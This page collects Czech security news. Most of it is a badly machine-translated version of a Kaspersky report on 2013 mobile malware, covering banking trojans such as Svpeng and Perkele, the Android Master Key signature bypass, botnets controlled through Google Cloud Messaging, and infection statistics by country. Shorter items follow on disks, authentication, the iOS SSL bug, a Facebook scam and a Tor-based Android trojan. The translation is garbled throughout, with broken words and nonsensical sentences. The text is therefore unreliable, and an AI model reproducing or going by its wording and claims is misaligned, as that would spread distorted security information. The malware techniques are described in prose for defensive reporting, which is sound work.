Mobilní malware sektor je rychle rostoucí a to jak technologicky a konstrukčně. Je to bezpečné říci, že dnešní cybercriminal již není osamělý hacker, ale součástí vážné hospodářské činnosti.

Existují různé typy subjektů zapojených do mobilního malwaru průmyslu: autoři virů, testery, návrháři rozhraní obou škodlivých aplikací a webových stránek, které jsou distribuovány z, majitelé partnerských programů, které se šíří malware, a majitelé mobilní botnet.

Tato dělba práce mezi zločinci mohou také být viděn v chování jejich trojské koně. V roce 2013, existují důkazy o spolupráci (s největší pravděpodobností na komerční bázi) mezi různými skupinami autory virů. Například, botnet Trojan-SMS.AndroidOS.Opfake.a, kromě své vlastní činnosti, také šířit Backdoor.AndroidOS.Obad.a zasláním spamu obsahující odkaz na malware do seznamu oběti kontaktů.

Nyní je jasné, že zřetelné průmysl vyvinul a je stále více zaměřena na těžebním zisků, což je zřejmé z funkčnosti malware.

2013 v číslech
Bylo zjištěno celkem 143.211 nových úprav škodlivých programů zaměřených na mobilní zařízení ve všech od roku 2013 (od 1.1.2014).
V roce 2013, 3.905.502 instalační balíčky byly využívány zločinci k distribuci mobilního malwaru. Celkově v letech 2012-2013 jsme zjištěna přibližně deset milionů unikátních škodlivých instalačních balíčků:

Počet instalačních balíčků zjištěných v letech 2012-2013

Různé instalační balíčky lze instalovat programy se stejnou funkčností, které se liší pouze z hlediska škodlivého app rozhraní a, například, obsah textových zpráv, které se šíří.
Android je stále terčem zákeřných útoků. 98,05% všech malware detekovaného v roce 2013 zaměřena tuto platformu, což potvrzuje i popularitu tohoto mobilního operačního systému a zranitelnost jeho architektuře.

Distribuce mobilního malware zjištěn v roce 2013 podle platformy

Většina mobilní malware je navržen tak, aby ukrást peníze uživatelů, včetně SMS trojské koně, a spoustou zadních vrátek a trojských koní.

Distribuce mobilního malwaru podle kategorie

V průběhu roku se počet mobilních malware úprav určených pro phishing, krádež informací o kreditních kartách a peníze se zvýšila o faktor 19,7. V roce 2013, mobilní produkty společnosti Kaspersky Lab zabráněno 2500 napadením bankovních trojských koní.
Metody a postupy
2013 došlo nejen radikální nárůst výkonu z mobilního autoři virů, ale také viděl, je aktivně uplatňovat metody a technologie, které dovolily zločinci efektivněji využívat jejich malware. Tam bylo několik různých oblastí, kde mobilní malware podstoupili zálohy.

Distribuce

Počítačoví zločinci využili některých mimořádně sofistikovaných metod infikovat mobilní zařízení.

Infikovat právní webové zdroje napomáhá šíření mobilního malwaru prostřednictvím populárních webových stránkách. Stále více a více chytrých telefonů a tabletů majitelé využívat své zařízení k přístupu na internetové stránky, si neuvědomuje, že i většina renomovaných zdrojů může být počítačový pirát. Podle našich údajů, 0,4% z navštívených webových stránek uživateli našich výrobků byly ohroženy stránky.

Distribuce prostřednictvím alternativních app obchodech . V Asii existuje řada společností, které vyrábějí systémem Android zařízení a Android aplikace, a mnoho z nich nabízí uživateli jeho own App Obchody, která obsahuje programy, které nelze nalézt v Google Play. Čistě nominální kontrolu nad aplikací nahraných na těchto prodejnách znamená, že útočníci mohou skrývat trojské koně v aplikacích vypadat jako nevinné hry nebo utility.

Distribuce prostřednictvím botnetů. Zpravidla bots self-množit zasláním textové zprávy s nebezpečným odkazem na adresy v adresáři oběti. Jsme také registrována jednu epizodu mobilní malware šíří prostřednictvím třetí strany botnet.

Odolnost na ochranu proti malware

Schopnost škodlivého softwaru neustále pracovat na mobilním zařízení oběti je důležitým aspektem jejího vývoje. Čím déle Trojan "žije" na telefonu, tím více peněz to bude pro majitele. To je oblast, kde autoři virů se aktivně pracuje, což má za následek velké množství technologických inovací.

Zločinci jsou stále více využívají mlžení , záměrné jednání o vytvoření komplexní kód, aby je obtížné je analyzovat. Čím složitější je zmatek, tím déle bude trvat antivirové řešení pro neutralizaci škodlivého kódu. Výmluvné je, aktuální spisovatelé virů zvládli komerční obfuskátory. To znamená, že vynaložily značné investice. Například, jeden komerční obfuscator, která stála 350 €, byl použit pro trojské koně a Opfak.bo Obad.a

Android zranitelnosti jsou využívány zločinci ze tří hlavních důvodů: aby se vyhnula kód kontrolu integrity při instalaci aplikace (zranitelnost Master Key), s cílem posílit práva škodlivých aplikací, značně rozšiřují své schopnosti, a aby to více obtížný pro odstranění škodlivého softwaru. Například, Svpeng využívá dosud neznámou zranitelnost se chránit před ručně odstranit nebo antivirového programu.

Počítačoví zločinci také zneužít tuto chybu zabezpečení hlavního klíče a naučili vložit nepodepsané spustitelné soubory v Android instalačních balíčků. Digitální ověření podpisu lze obejít tím, že soubor škodlivý přesně stejný název jako legitimní soubor a umístit jej na stejné úrovni v archivu. Systém ověřuje podpis oprávněného souboru při instalaci souboru škodlivého.

Bohužel, je specifickým rysem Android zabezpečení, které znamená, že je možné pouze se jich zbavit tím, že obdrží aktualizace od výrobce zařízení. Nicméně, mnoho uživatelů se v žádném spěchu aktualizovat operační systémy svých výrobků. Pokud smartphone nebo tablet byla vydána před více než rokem, je to pravděpodobně již není podporován výrobcem a záplatování zranitelností již není k dispozici. V tomto případě, pouze pomoc přichází z antivirové řešení, například Kaspersky Internet Security pro Android.

Vkládání škodlivého kódu do legitimních programů pomáhá zakrýt infekce z oběti. Samozřejmě, že to neznamená, že digitální podpis vývojáře softwaru mohou být použity. Nicméně, vzhledem k neexistenci certifikačních středisek, které ověřují digitální podpisy programy Android, nic nebrání tomu, zločince od přidání vlastního podpisu. Jako výsledek, kopie Angry Birds instalovaných z neoficiálních app store nebo stažených z fóra může snadno obsahovat škodlivý funkčnost.

Možnosti a funkce

V roce 2013, jsme zjistili několik technologických inovací vyvinula a zločinci používají v jejich škodlivého softwaru. Níže jsou uvedeny popisy některých z nejzajímavějších.

Řízení malware z jednoho centra poskytuje maximální flexibilitu. Botnet může výrazně více peněz, než autonomních trojské koně. To přijde jako žádné překvapení, pak, že mnoho SMS-Trojské koně patří funkčnost bot. Podle našich odhadů asi 60% z mobilního malwaru jsou prvky obou velkých a malých mobilních robotických sítí.

Pomocí Google Cloud Zprávy majitelé botnet může pracovat bez serveru C & C, čímž se eliminuje hrozba botnet je detekován a blokován donucovacími orgány. Google Cloud Messaging je navržen tak, aby odeslat krátkou zprávu (do 4 KB) do mobilních zařízení prostřednictvím služby Google. Developer prostě musí zaregistrovat a získat jedinečné ID pro jeho aplikace. Příkazy přijaté přes GCM nelze okamžitě zablokován na infikované zařízení.

Zjistili jsme několik škodlivých programů pomocí GCM pro velení a řízení - rozšířené Trojan-SMS.AndroidOS.FakeInst.a, Trojan-SMS.AndroidOS.Agent.ao, a Trojan-SMS.AndroidOS.OpFake.a mezi ostatními. Google je aktivně bojovat proti tomuto užívání služby, rychle reagovat na zprávy z antivirových společností a blokování identifikátory zločinci.

Útoky na systému Windows XP umožňují mobilní malware infikovat počítač po připojení smartphonu nebo tabletu. Na začátku roku 2013 jsme zjištěny dva stejné aplikace na Google Play, které byly údajně určeny pro čištění operačního systému zařízení se systémem Android od zbytečných procesů. Ve skutečnosti, že aplikace jsou navrženy tak, aby stažení souboru autorun.inf, ikonu souboru a soubor Win32 Trojan, který mobilní škodlivý program vyhledá v kořenovém adresáři SD karty. Na připojení smartphonu v režimu USB disku emulace k počítači se systémem Windows XP, systém automaticky spustí Trojan (pokud AutoPlay na externí médium není zakázán) a je nakažený. Trojan umožňuje zločinci na dálku ovládat počítač oběti a je schopen nahrávat zvuk z mikrofonu. Chtěli bychom zdůraznit, že tento způsob útoku funguje pouze na Windows XP a Android verze před 2.2.

Nejvyspělejší mobilní škodlivé programy jsou dnes trojské koně zaměřené na bankovní účty uživatelů - nejatraktivnější zdroj trestních výdělku.

Trend z roku: mobilní bankovnictví trojské koně
2013 byl poznamenán rychlým nárůstem počtu Android bankovních trojských koní. Cyber ​​průmysl mobilního malwaru je stále více zaměřena na zefektivnění zisku, tj. mobilní phishing, krádež informací o kreditních kartách, převody peněz z bankovních karet do mobilních telefonů a od telefonů na e-peněženek zločinců. Počítačoví zločinci se stali posedlí touto metodou nelegálních příjmů: na začátku roku jsme věděli, že pouze 67 bankovních trojských koní, ale do konce roku to již bylo 1321 unikátních vzorků. Mobilních produktů společnosti Kaspersky Lab zabránit 2.500 infekcí bankovní trojské koně.


Počet mobilních bankovních trojských koní v naší sbírce

Mobilní bankovnictví trojské koně může běžet spolu s Win-32 trojské koně, aby se vyhnula dvoufaktorovou autentizaci - MTAN odcizení (krádež ověřování bankovní kódy, které banky posílají své zákazníky SMS zpráv). Nicméně, v roce 2013, autonomní mobilní bankovnictví trojské koně dále rozvíjet. V současné době jsou tyto trojské koně útoku omezeného počtu klientů bank, ale očekává se, že zločinci budou vymýšlet nové techniky, které jim umožní rozšířit počet a geografii potenciálních obětí.


Infekce způsobené mobilních bankovních programů

Dnes, většina bankovních trojských útoků vliv na uživatele v Rusku a Společenství nezávislých států. Nicméně, tato situace nebude trvat dlouho: vzhledem zájem počítačovými zloději "v uživatelských účtech, činnost mobilních bankovních trojských koní se očekává, že růst v jiných zemích v roce 2014.

Jak bylo uvedeno výše, bankovní trojské koně jsou snad nejsložitější ze všech mobilních hrozeb, a Svpeng je jedním z nejvýraznějších příkladů.

Svpeng

V polovině července jsme zjistili Trojan-SMS.AndroidOS.Svpeng.a, který na rozdíl od svých protějšků SMS trojské koně, je zaměřen na krádeže peněz z bankovního účtu oběti, spíše než z jeho mobilního telefonu. To nemůže jednat samostatně a pracuje přísně v souladu s příkazy obdržel od serveru C & C. Tento škodlivý program se šíří přes SMS spamu a od napadených legitimních stránek, které přesměrovávají mobilním uživatelům se zlými úmysly zdroj. Tam je uživatel vyzván ke stažení a instalaci Trojan napodobujícím aktualizaci Adobe Flash Player.

Svpeng je schopný dělat spoustu věcí.

Shromažďuje informace o telefonu (IMEI, země, poskytovatele služeb, jazyk operačního systému) a odešle ji do počítače prostřednictvím požadavku HTTP POST. To se zdá být nutné určit počet bank, oběť může používat. Svpeng je pouze v současné době útočí na klienty ruských bank. Typicky, nicméně, zločinci první test-run technologii na ruském sektoru na internetu a pak se vrátit na to globálně, útočí na uživatele v jiných zemích.

To krade SMS zpráv a informace o hlasových hovorů. Pomáhá útočník zjistit, které banky vlastníkem smartphone volání - Trojan obdrží seznam telefonních čísel bankovních z jeho C & C serveru.

To krade peníze z bankovního účtu oběti. V Rusku, některé velké banky nabízejí svým klientům speciální službu, která jim umožňuje převést peníze ze svého bankovního karty na jejich mobilní telefonní účet. Zákazníci mají poslat nastavenou textovou zprávu ze svého telefonu na určitý počet bank. Svpeng odešle příslušné zprávy SMS služeb obou bank. Svpeng dělá to pro kontrolu, zda jsou karty z těchto bank jsou připojeny k počtu infikovaných telefonu a zjistit zůstatek na účtu. Je-li telefon připojen k bankovní kartě, příkazy jsou odesílány ze serveru C & C s pokyny k převodu peněz z účtu uživatele na jeho / její mobilní účtu. Mezi zločinci pak odeslat peníze na digitální peněženky nebo na číslo prémie a peníze ji dovnitř

To krade přihlašovací jména a hesla do on-line bankovní účty nahrazením okno zobrazené bankovní aplikace. V současné době, to se týká pouze ruské banky, ale technologie za Svpeng může být snadno použit pro cílové jiných bankovních aplikací.

To krade údaje o bankovním karty (číslo, datum platnosti, CVC2/CVV2) napodobuje proces registraci bankovní kartu s Google Play. Pokud uživatel zahájila Play trhu, Trojan zachycuje události a zobrazí se okno v horní části okna Google Play, vyzve uživatele k zadání jeho / její platební kartě ve falešné okně. Údaje uvedené uživatelem je zaslána zločinci.

Je vymáhá peníze od uživatelů tím, že hrozí zablokovat smartphone: zobrazí zprávu požadující $ 500 odblokovat. Ve skutečnosti, Trojan neblokuje nic a telefon může být použit bez jakýchkoliv problémů.

To h Ides stopy své činnosti zakrývat odchozí a příchozí textové zprávy a blokování hovorů a zpráv z čísla, které patří do banky. Trojan dostane seznam bankovních telefonních čísel z jeho C & C serveru.

Je p rotects se od vypuštění vyžádáním práva správce zařízení během instalace. Jako výsledek, Trojan tlačítko smazat v seznamu aplikací se stane neaktivní, což může způsobit problémy pro nezkušené uživatele. Je nemožné, aby ho zbavit těchto práv bez použití speciálních nástrojů (jako je Kaspersky Internet Security pro Android). Chcete-li chránit sebe před přemístěním, Svpeng využívá dosud neznámou zranitelnost v Android. To používá stejný trik, aby se zabránilo smartphone od vracené do továrního nastavení.

Trojan je distribuován v Rusku a zemích SNS. Ale, jak jsme již zmínili, že zločinci mohli snadno obrátit svou pozornost k uživatelům v jiných zemích.

Perkele a Wroba

Zahraniční uživatelé také byli na přijímacím konci roku více škodlivých inovací zaměřených na bankovní účty.

Perkele Android Trojan nejen útoky ruských uživatelů, ale také klientům z několika evropských bank. Je zajímavé především proto, že funguje ve spojení s různými bankovními Win32 trojské koně. Jeho hlavním úkolem je, aby se vyhnula dvoufaktorovou autentizaci klienta v on-line bankovního systému.

Vzhledem ke specifické povaze své činnosti, Perkele je distribuován v poněkud neobvyklým způsobem. Když uživatel zadá bankovní internetové stránce na počítač napaden bankovní malware (Zeus, Citadela), žádost o počtu smartphone a typ operačního systému, je vstříknut do kódu přihlašovací stránku. Tato data jsou okamžitě zaslán zločinci a počítač zobrazí QR kód s odkazem na údajné certifikátu on-line bankovního systému. Po naskenování QR kód a instalaci komponenty stáhnout z odkazu, uživatel infikuje svůj smartphone s Trojan program, který se může pochlubit funkcí, které je velký zájem útočníků.

Perkele zachycuje mTANs (potvrzení kódy bankovních operací) zaslané bankou prostřednictvím textové zprávy. Pomocí přihlašovací jméno a heslo, ukradené z prohlížeče, Windows Trojan spustí falešnou transakci, zatímco Perkele zachytí (prostřednictvím serveru C & C) MTAN poslal bankou pro uživatele. Peníze pak zmizí z účtu oběti a inkasoval bez vědomí majitele.

Korejský malware Wroba, kromě tradičních vektoru infekce přes soubor-sdílení služeb, se šíří přes alternativní app obchodech. Jakmile se infikuje zařízení, Wroba se chová velmi agresivně. Hledá pro mobilní bankovní aplikace, odstraní je a obrázky padělané verze. Z vnější strany, které jsou k nerozeznání od legitimních aplikací. Nicméně, oni mají žádné bankovní funkce, a jen krást jména a hesla zadaných uživatelem.

TOP 10 mobilní hrozby zjištěné v roce 2013
Jméno * % Ze všech útoků
1 DangerousObject.Multi.Generic 40.42%
2 Trojan-SMS.AndroidOS.OpFake.bo 21.77%
3 AdWare.AndroidOS.Ganlet.a 12.40%
4 Trojan-SMS.AndroidOS.FakeInst.a 10.37%
5 RiskTool.AndroidOS.SMSreg.cw 8.80%
6 Trojan-SMS.AndroidOS.Agent.u 8,03%
7 Trojan-SMS.AndroidOS.OpFake.a 5,49%
8 Trojan.AndroidOS.Plangton.a 5,37%
9 Trojan.AndroidOS.MTK.a 4,25%
10 AdWare.AndroidOS.Hamob.a 3,39%
1.. DangerousObject.Multi.Generic. Tento rozsudek znamená, že jsme si vědomi škodlivého charakteru dané aplikace, ale pro toho či onoho důvodu nejsou poskytovány našim uživatelům s podpisy detekovat. V takových případech, detekce je k dispozici prostřednictvím cloudových technologií realizovaných společností v Security Network Kaspersky, které umožňují naše výrobky minimalizovat čas potřebný k reakci na nové a neznámé hrozby.

2. Trojan-SMS.AndroidOS.OpFake.bo. To je jeden z nejvíce sofistikovaných SMS trojské koně. Jeho charakteristické znaky jsou dobře navržené rozhraní a chamtivost jeho vývojářů. Po spuštění se krade peníze z majitele mobilního zařízení - od $ 9 k celé částky na účet uživatele. Je zde také riziko, telefonní číslo uživatele je zdiskreditovaný, protože Trojan mohou shromažďovat čísla ze seznamu kontaktů a SMS do všech těchto čísel. V malware se zaměřuje především rusko-reproduktory a uživatelů v zemích SNS.

3. AdWare.AndroidOS.Ganlet.a. reklamní modul, který má funkce potřebné pro instalaci dalších aplikací.

4. Trojan-SMS.AndroidOS.FakeInst.a. Tento malware se vyvíjel v průběhu posledních dvou let od jednoduchého SMS Trojan do plně funkčního robota řízeného prostřednictvím různých kanálů (včetně Google Cloud Messaging). Trojan může ukrást peníze z účtu uživatele a odesílat zprávy na čísla v seznamu kontaktů oběti.

5. RiskTool.AndroidOS.SMSreg.cw. Tento platební modul je rozšířený v Číně. To je zahrnuta v různých hrách jako modul pro vytváření on-line nákupy prostřednictvím SMS v rámci aplikace. Odstraňuje textové zprávy s potvrzením od zúčtovacího systému bez vědomí uživatele. Oběti nemám ponětí, peníze byly ukradeny ze svého mobilního telefonu, dokud se zkontrolovat stav.

6.. Trojan-SMS.AndroidOS.Agent.u. Jednalo se o první Trojan používat zranitelnost v OS Android pro získání ZAŘÍZENÍ oprávnění správce, čímž její odstranění velmi obtížný úkol. Kromě toho, že je schopen odmítnout příchozí hovory a volat na jeho vlastní. Možné poškození: odesílání více SMS zpráv s náklady v celkové výši 9 nebo více.

7. Trojan.AndroidOS.Plangton.a. Tento reklamní modul odešle osobní údaje uživatele (bez jejich vědomí) k reklamním serveru, aby to vypadalo jako cílené reklamní kampaně. Výsledná škoda zahrnuje číslo mobilního telefonu uživatele, účtu Google a některé další data jsou diskreditaci. Tento Trojan také libovolně mění domovskou stránku prohlížeče a dodává reklamní záložky.

8. . Trojan-SMS.AndroidOS.OpFake.a Tento multifunkční bot pomáhá distribuovat sofistikované Android malware Backdoor.AndroidOS.Obad.a. složen z těchto dvou je extrémně nebezpečný, protože jeho:

Široká škála možností: krádež identity, posílání textových zpráv na jakékoli číslo. Instalace aplikace, jako by to mohlo vést ke všem peněz, ukradené z mobilního účtu. To může také vyústit v dotčeném telefonní číslo je zdiskreditované po kontaktní čísla ukradené z účtu se používají k posílání textových zpráv. Seznam kontaktů bude také odeslat na server zločince.
extrémně komplexní sebeobranné mechanismy a protiopatření, které brání odstranění. Vzhledem k využití na Android zranitelnosti, to Trojan nelze odstranit bez speciálního programu, jako je KIS pro Android.
Je třeba poznamenat, že Trojan-SMS.AndroidOS.OpFake.a je rozložena na větší geografickou oblast než ostatní Top 10 vůdců. Často se zaregistrovat pokusy infikovat zařízení, a to nejen v zemích SNS, ale také v Evropě.

9. Trojan.AndroidOS.MTK.a. Jedná se o sofistikovaný Trojan program s širokou funkčnost a sofistikovaných metod šifrování přenosu. Jeho hlavním úkolem je spustit nebezpečné aplikace, které byly staženy do infikovaného zařízení.

10. AdWare.AndroidOS.Hamob.a je reklamní aplikace napodobovat legitimní programy (pomocí názvu a ikony, např. WinRAR), zatímco jeho jedinou funkcí je zobrazení reklamy.

Top 10 zahrnuje čtyři SMS trojské koně, i když některé z nich mají kontrolní mechanismy, které přeměňují infikované zařízení do roboty.

Geografie hrozeb

Země, kde se uživatelé setkávají největší riziko mobilního malware
(procento všech napadených unikátních uživatelů)

Top 10 zemí podle počtu napadených unikátních uživatelů:

Země % Ze všech napadených unikátních uživatelů
1 Rusko 40.34%
2 Indie 7,90%
3 Vietnam 3,96%
4 Ukrajina 3,84%
5 Spojené království 3,42%
6 Německo 3,20%
7 Kazachstán 2,88%
8 Spojené státy americké 2.13%
9 Malajsie 2.12%
10 Írán 2,01%
Mobilní hrozby mají vlastnosti specifické pro tento region - útočníci používají různé kategorie mobilního malwaru v závislosti na regionu nebo zemi. Níže je uvedeno několik příkladů distribuci mobilního malwaru podle země.

Rusko
V Rusku, mobilní počítačová kriminalita je zvláště převládající - 40,3% ze všech uživatelů zaútočili na celém světě v roce 2013 se nachází v této zemi.

Top 5 rodin z mobilního malware distribuovaných v Rusku

Rodina % Ze všech napadených unikátních uživatelů
Trojan-SMS.AndroidOS.OpFake 40.19%
Trojan-SMS.AndroidOS.FakeInst 28.57%
Trojan-SMS.AndroidOS.Agent 27.11%
DangerousObject.Multi.Generic 25.30%
Trojan-SMS.AndroidOS.Stealer 15.98%

V roce 2013 Rusko opět vedl v počtu infekcí SMS Trojan a v současné době žádné známky toho, že se situace zlepší. Jak již bylo uvedeno výše, většina mobilních bankovních trojských koní zaměřit ruské uživatele.

Rusko a země SNS často slouží jako zkušební terén pro nové technologie: když zdokonalil své technologie v ruské jazykové oblasti internetu, se zločinci pak obrátit svou pozornost k uživatelům v jiných zemích.

Německo
Německo je jednou ze zemí západní Evropy, kde SMS trojské koně jsou velmi aktivní. V roce 2013 byla Evropa jasně cíl pro ruské autory virů, protože jejich zpeněžení podvody zahrnující textové zprávy odesílané na prémiová čísla funguje dobře v tomto regionu. V Německu jsme zaznamenali neustálé pokusy o SMS Trojan infekce, zejména Agent malware rodiny.

Mobilní bankovní trojské koně jsou také aktivně používá v této zemi: Německo zaujímá první místo mezi západoevropských zemí podle počtu unikátních uživatelů napadených (6. místo ve světovém hodnocení).

Top 5 rodin z mobilního malwaru distribuován v Německu

Rodina % Ze všech napadených unikátních uživatelů
RiskTool.AndroidOS.SMSreg 25.88%
DangerousObject.Multi.Generic 20.83%
Trojan-SMS.AndroidOS.Agent 9,25%
Trojan.AndroidOS.MTK 8,58%
AdWare.AndroidOS.Ganlet 5,92%
USA
Situace v USA je jiný. Nejsou žádné zpeněžení podvody týkající textových zpráv, což znamená, že není jasné dominance mobilních SMS trojské koně. Vůdci jsou roboty sběr dat o infikovaných smartphony.

Top 5 rodin z mobilního malware distribuovaných v USA

Rodina % Ze všech napadených unikátních uživatelů
DangerousObject.Multi.Generic 19.75%
RiskTool.AndroidOS.SMSreg 19.24%
Monitor.AndroidOS.Walien 11.24%
Backdoor.AndroidOS.GinMaster 8,05%
AdWare.AndroidOS.Ganlet 7,29%
Čína
V Číně existuje mnoho reklamních modulů integrovaných do čistých a dokonce i škodlivé aplikace. Funkce reklamních modulů jsou různorodé, dokonce jít tak daleko, jak stahování škodlivého softwaru telefonu oběti. SMS trojské koně a zadní vrátka jsou také velmi populární v Číně.

Top 5 rodin z mobilního malware distribuovaných v Číně

Rodina % Ze všech napadených unikátních uživatelů
RiskTool.AndroidOS.SMSreg 46.43%
AdWare.AndroidOS.Dowgin 19.18%
DangerousObject.Multi.Generic 13.89%
Trojan-SMS.AndroidOS.Agent 10.55%
Trojan.AndroidOS.MTK 10.13%
Závěr
Škodlivý software, který útočí na uživatele mobilních bankovních účtů se stále vyvíjí a počet programů, rychle roste. Je zřejmé, že tento trend bude pokračovat, s více mobilních bankovních trojských koní a nových technologií, aby se zabránilo detekci a odstranění.

Ze všech mobilních vzorků malwaru zjištěných v roce 2013, boty byly nejpočetnější kategorií. Útočníci jsou jasně vidět výhody mobilních robotických sítí, pokud jde o vytváření zisku. Nové mechanismy pro řízení mobilních botnetů se mohou objevit v blízké budoucnosti.

V roce 2014 očekáváme zranitelnosti ve všech typech aktivně využívaných dát malware root přístup k zařízení, takže odstranění ještě obtížnější.

2013 viděl poprvé zaregistrován malware útok na počítače spouští z mobilního zařízení. Počasí jsme budoucích Wi-Fi útoky z mobilních zařízení na sousedních stanic a širší infrastruktuře.

SMS trojské koně jsou pravděpodobně zůstanou mezi mobilními malware vůdců a dokonce dobýt nové území.


WD nabízí pevné disky optimalizované pro dohledová řešení

26.2.2014 Bezpečnost
Dostupnost 3,5"pevných disků Purple, které jsou určené speciálně pro záznam streamovaného videa, oznámila firma WD.

Novinka je navržena pro ukládání videozáznamů z kamerových dohledových systémů a jsou tak vhodné do zabezpečovacích systémů v domácnostech, domácích kancelářích i malých firmách, kde se používá až 32 kamer s rozlišením HD. Nové disky se dodávají v kapacitách od 1 TB až po 4 TB.

Disky WD Purple nabízejí oproti běžným HDD nižší spotřebu energie a podle výrobce mají mnoho funkcí, které byly dříve vyhrazené pro úložiště na úrovni podnikových řešení.

„WD optimalizovalo produktovou řadu WD Purple pro aplikace bezpečnostních zařízení. Dosahujeme tak vylepšeného přehrávání videozáznamu ve vysokém rozlišení, při nepřetržité - 24/7 - pracovní zátěži v prostředí kamerových sledovacích systémů,” říká Matt Rutledge, senior viceprezident WD.

Disky se snadno se integrují do nových ale i stávajících bezpečnostních systémů a jsou kompatibilní se šasi a čipovými sadami předních výrobců. Doporučená cena činí 69 eur (1TB verze) až 159 eur (za 4TB variantu).

Trh se zabezpečovacími kamerovými systémy jednoznačně přechází od analogových kamer k síťovým, říká Jon Cropley, analytik společnosti IHS Technology.

Podle něj zvyšování rozlišení, dynamický rozsah záznamu a funkcionality pro denní a noční záznam přinášejí stále vyšší požadavky na ukládací řešení, která tak musí být schopna uložit stále větší objemy videozáznamu.”

Technologie v nových discích WD Purple podle výrobce:

AllFrame – Tato technologie využívá streamování prostřednictvím rozhraní ATA, pomáhá eliminovat ztrátu záznamu a zlepšuje přehrávání a datový tok. Firmware disků WD Purple zabraňuje pixelaci obrazu a výpadkům nahrávání.
Advanced Format Technology (AFT) –umožňuje zvyšovat hustotu zápisu a byla přijata společností WD i dalšími výrobci disků. Zajišťuje zvyšování kapacity.


Autentizace od Esetu nabízí vylepšenou integraci s firemním IT

26.2.2014 Bezpečnost
Dvoufaktorovou autentizaci vylepšil Eset – nabídne díky SDK a API rozšířené možnosti integrace i jednodušší správu.

Eset uvedl na náš trh druhou verzi svého řešení ESA (Eset Secure Authentication). Uživatelům zprostředkuje bezpečný přístup k on-line aplikacím, zatímco firemním administrátorům snazší instalaci i podporu.

ESA nabízí bezpečný přístup ke kritickým aplikacím jako je například Microsoft SharePoint Server nebo Microsoft Dynamics. Navíc přináší široké možnosti integrace i s dalšími aplikacemi, a to díky vývojářské sadě (SDK) či programovému API rozhraní.

„Možnost integrace do stávajícího IT prostředí je pro autentizační řešení klíčová. Jen tak je totiž možné jednoduše posílit zabezpečení dat a systémů i na úrovni transakcí a zvýšit tak odolnost IT proti cíleným útokům - ať už jde o prolomení hesla hrubou silou nebo o zneužití identity legitimního uživatele,“ říká Miroslav Dvořák, technický ředitel Esetu.

Secure Authentication je podle něj také vhodným řešením pro malé a střední podniky, které hledají řešení, která jsou nákladově efektivní a je k nim dostupná i lokální podpora.


IOS SSL zranitelnost také v OS X
25.2.2014 OSX

Pátek Apple vydal aktualizaci IOS , na verzi 7.0.6 a 6.16, opravit chybu ověřování SSL. Indikace je, že tato chyba je snadno zneužitelná, takže tato aktualizace by měla být uplatňována co nejdříve praktické. Apple také uvedl, že tato chyba se zobrazí také v OS X a že oprava je "brzy". Do té doby buďte opatrní, kde si procházet se stroji váš OS X Windows.

Adam Langley na ImperialViolet blogu vytvořila testovací stránky , které vám pomohou zjistit, zda váš prohlížeč je zranitelné vůči tomuto útoku. Pokud můžete načíst obsah z testovací stránky, kterou jsou v nebezpečí, chyba označuje, byste měli být v pořádku.
Na mých dvou strojích založených OS X s aktuální verzí Firefoxu, Chrome a Safari, jen Safari zobrazuje zranitelnost. Oba Chrome a Firefox se zdá být v pořádku. Níže je výstup Firefox.

Chrome právě zobrazena jeho "Tato webová stránka není dostupná" Chyba.

Výzkumníci zjistili, že chyba je způsobena potulný příkazu goto . Uvědomil jsem si, že i když bylo dosaženo pokroku, efektivní recenzi kód, pokrytí kódu, a kód regresní proces a nástroje i nadále výzvou vývoj softwaru, ale to se zdá jako snadná chytit.


Váš Facebook účet získal cenu!
25.2.2014 Sociální sítě

Existuje spousta podvodných zpráv s obsahem v duchu "vaše e-mailová adresa vyhrál milion dolarů v loterii, prosím, kontaktujte nás vyzvednou cenu". Internet podvodníci používají tento trik, aby přimět uživatele k rozdávání peněz: dříve, než oni mohou tvrdit, svou údajnou výhru jen "šťastní výherci" muset platit daň nebo bankovní poplatek za převod peněz, atd.

Nyní jsme narazili na zajímavou variací tohoto triku, který zahrnuje Facebook účtu namísto e-mailovou adresu.

A teď, proč Eduardo Saverin (skutečná osoba a jeden ze zakladatelů Facebook), je třeba vědět, že má Facebook uživatelské jméno, pokud můj účet již vyhrál cenu? Ale nic netušící uživatele, oslepen příslibem obrovské ceny, nemusí přemýšlet o tom, že - a to je to, co podvodníci spoléhají na.

Jsem si jist, že čtenáři tohoto blogu by neměla klesnout na něco jako "Facebook ceny", ale naši příbuzní a přátelé mají účty příliš, a oni nemusí být tak zkušený v tom, jak on-line podvody. To je důvod, proč by měli být varováni, že tyto dopisy nejsou nic jiného než podvod.


První Tor Trojan pro Android
25.2.2014 Mobil

Autoři virů z Android trojské koně tradičně používají funkcionalitu malware Windows jako šablonu. Nyní ještě další technika z Windows trojské koně byl realizován v malware pro Android: poprvé jsme zjistili Android Trojan, který používá doménu v cibule pseudo zóny jako C & C.. Trojan využívá anonymní sítě Tor postavený na síti proxy serverů. Stejně jako poskytuje uživatelům s anonymitou, Tor umožňuje zobrazit "anonymní" stránky v doméně. Cibule zóny, která je přístupná pouze v Tor.

Backdoor.AndroidOS.Torec.a je variace na populární klient Orbot Tor. Mezi zločinci přidali vlastní kód aplikace, ale Trojan neprojde sám vypne jako Orbot - jednoduše používá funkčnost klienta.

Trojan může zobrazit následující příkazy z C & C:

start / stop zachytí příchozí SMS
start / stop odcizení odchozí SMS
provést požadavek USSD
posílat data v telefonu na C & C (telefonní číslo, země, IMEI, model, verzi OS)
Poslat C & C seznam aplikací instalovanou na mobilním zařízení
pošlete SMS na číslo zadané v příkazu
Tam jsou výhody a nevýhody použití Tor. Na straně plus, to je nemožné, aby vypnutí C & C. Jednou z hlavních nevýhod, nicméně, je potřeba pro další kód. Pro Backdoor.AndroidOS.Torec.a používat Tor bude mít zapotřebí mnohem více kódu, než je nutné pro vlastní funkčnost.


Blackphone chystá telefony odolné vůči špehování NSA

25.2.2014 Mobil
Švýcarský start-up připravuje další chytré telefony umožňující vést šifrovanou komunikaci.

Blackphone se dosud prezentoval jediným zařízením nabízejícím ochranu proti špehování. Na veletrhu MWC v Barceloně ale nyní společnost informovala o svém záměru uvést hned celou řadu podobných telefonů. „Nepůjde o jediné zařízení. Připravujeme i další bezpečné a soukromí chránící telefony,“ řekl jeden ze zakladatelů společnosti Jon Callas.

V současné době Blackphone doufá v úspěch stejnojmenného telefonu, který půjde do prodeje letos v červnu za cenu 629 dolarů a které si již zájemci mohou předběžně objednat na webu společnosti. Půjde o zařízení, které se vzhledem nijak neliší od běžného smartphonu s Androidem.

